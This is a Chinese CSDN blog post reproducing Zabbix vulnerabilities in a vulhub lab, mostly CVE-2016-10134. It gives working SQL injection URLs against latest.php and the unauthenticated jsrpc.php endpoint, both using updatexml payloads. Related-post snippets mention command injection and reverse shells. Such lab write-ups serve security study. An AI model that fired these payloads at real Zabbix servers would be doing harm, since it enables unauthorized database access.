vulhub漏洞复现77_zabbix

最新推荐文章于 2024-07-18 15:04:46 发布
最新推荐文章于 2024-07-18 15:04:46 发布
阅读量1.5k 收藏 2
点赞数
文章标签: php 安全 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122922259
版权
本文详细介绍了Zabbix的三个安全漏洞:CVE-2016-10134的PHP SQL注入,CVE-2017-2824的命令注入,以及CVE-2020-11800的IPv6命令注入。通过复现这些漏洞,展示了攻击者如何利用这些漏洞执行任意SQL查询和命令,以及如何配置和检测这些漏洞。文章还提供了环境搭建方法和POC代码。
摘要由CSDN通过智能技术生成

一、 CVE-2016-10134_ zabbix latest.php SQL注入漏洞

漏洞详情

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

运行环境

靶场:192.168.4.10_ubuntu

执行如下命令启动zabbix 3.0.3:

#docker-compose up -d

执行命令后,将启动数据库(mysql)、zabbix server、zabbix agent、zabbix web。如果内存稍小,可能会存在某个容器挂掉的情况,我们可以通过`docker-compose ps`查看容器状态,并通过`docker-compose start`来重新启动容器。

复现漏洞

访问`http://your-ip:8080`,用账号`guest`(密码为空)登录游客账户。

登录后,查看Cookie中的`zbx_sessionid`,复制后16位字符:

将这16个字符作为sid的值,访问`http://your-ip:8080/latest.php?output=ajax&sid=849cafc30fd8348b&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`,可见成功注入:

 

这个漏洞也可以通过jsrpc.php触发,且无需登录:`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:

最低0.47元/天 解锁文章
Revenge_scan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zabbix在windows下安装文档.zip_historymts_oracle_zabbix_zabbix 监控oracle
09-23
Zabbix是一款开源的网络监控系统,能够有效监控网络设备、服务器、应用程序等,包括Oracle数据库。本篇文章将详细阐述如何在Windows环境下安装Zabbix,并利用它来监控Oracle数据库。 首先,我们需要了解Zabbix的...
vulhub漏洞复现1
xhscxj的博客
05-23 1942
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
Zabbix SQL注入(CVE-2016-10134)
最新发布
qq_23003811的博客
07-18 185
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入。3、发现注入点profileIdx、profileIdx2。2、sqlmap跑注入点。
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 1926
Shiro漏洞复现汇总
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
做自己喜欢的事,并将其发挥到极致!
06-30 1372
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。...
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
zabbix_server_zabbix源码_
09-30
开发的软件产品在交付使用的时候,往往会授权一段时间的试用期,这个时候license就派上用场了。不同于在代码中直接加上时间约束,需要重新授权的时候使用license可以避免修改源码,改动部署,授权方直接生成一个新的...
fly_zabbix:Zabbix监控模块
07-11
Zabbix监控模块——fly_zabbix深度解析》 在IT运维领域,监控系统扮演着至关重要的角色,它能够实时监测服务器、网络设备以及应用程序的状态,及时发现并预警潜在的问题,从而保证系统的稳定运行。其中,Zabbix是...
zabbix发送微信.zip_zabbix_微信 发送消息
09-20
在IT监控领域,Zabbix是一款广泛应用的开源网络监控和管理系统,能够实时监控各种网络参数以及服务器的健康状况和性能数据。结合微信发送消息的功能,可以让管理员在问题发生时第一时间收到警报,从而快速响应和处理...
SNMP-Network_SNMP_zabbix_
10-01
Zabbix是一款开源的企业级监控解决方案,能够监控各种网络参数以及服务器健康状态。Zabbix支持SNMP,通过SNMP可以对网络设备进行高效且全面的监控。 本压缩包文件"SNMP-Network_Zabbix_"提供的“SNMP-Network.xml”...
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1544
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
CVE-2017-2824 zabbix 命令注入漏洞(未授权访问/绕过登录)
qq_41567985的博客
09-27 671
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。命令执行后,执行docker-compose ps查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。总结一下: 其中那个多试几次就好,还有,超时时间改小一点,不要极端,不然很难反弹shell。---->可见-权限算太高。
漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 416
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2613
vulhub-spring漏洞复现
vulhub漏洞复现-saltstack(CVE-2020-11651、CVE-2020-11652)越权命令执行/遍历目录
遇事不决冲冲冲
10-10 4704
SaltStack 基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集中管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本中出现了认证绕过漏洞,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行
Zabbix爆高危漏洞CVE-2017-2824
Listen2You的博客
05-10 4103
导读 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。   关于Zabbix zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题
漏洞复现vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 456
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关复现资料,阅读很多文章,最终发现有博主出现和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞 (CVE-2016-10134)
qq_51577576的博客
08-14 3698
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
MAIN_ZABBIX_ENTRY
07-08
MAIN_ZABBIX_ENTRY 是一个在Zabbix监控系统中的主要入口点。它是指Zabbix服务器的主要程序入口,负责启动和管理Zabbix的各个组件,包括数据库连接、数据收集、监控配置和报警通知等功能。通过 MAIN_ZABBIX_ENTRY,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值